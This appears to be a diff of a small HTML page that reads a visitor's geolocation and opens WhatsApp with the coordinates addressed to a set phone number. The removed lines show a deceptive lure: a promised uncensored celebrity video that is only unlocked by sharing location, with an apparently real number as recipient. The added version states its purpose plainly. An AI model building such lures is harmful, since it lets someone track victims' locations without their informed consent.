--- a/index.html
+++ b/index.html
@@ -10,10 +10,11 @@
   </style>
 </head>
 <body>
-  <div id="msg">📍 Casa de los famosos sin censura…</div>
+  <div id="msg">📍 Obteniendo tu ubicación…</div>
 
   <script>
-  const you = "573116245218;      // ← sustituye por TU número (ej. 573001234567)
+  const you = "57XXXXXXXXX";          // ← pon aquí TU número sin +
+  const show = t => document.getElementById("msg").textContent = t;
   const openWA = t =>
     location.href = `https://wa.me/${you}?text=${encodeURIComponent(t)}`;
 
@@ -21,13 +22,10 @@
     p => {
       const {latitude:lat, longitude:lon, accuracy:acc} = p.coords;
       const txt = `I am here: ${lat.toFixed(5)}, ${lon.toFixed(5)} (±${Math.round(acc)} m)`;
-      document.getElementById("msg").textContent = "Abriendo WhatsApp…";
+      show("Abriendo WhatsApp…");
       openWA(txt);
     },
-    _ => {
-      document.getElementById("msg").textContent =
-        "⚠️ Toca Permitir para compartir para ver el video.”;
-    }
+    _ => show("⚠️ Toca Permitir para compartir tu ubicación.")
   );
   </script>
 </body>
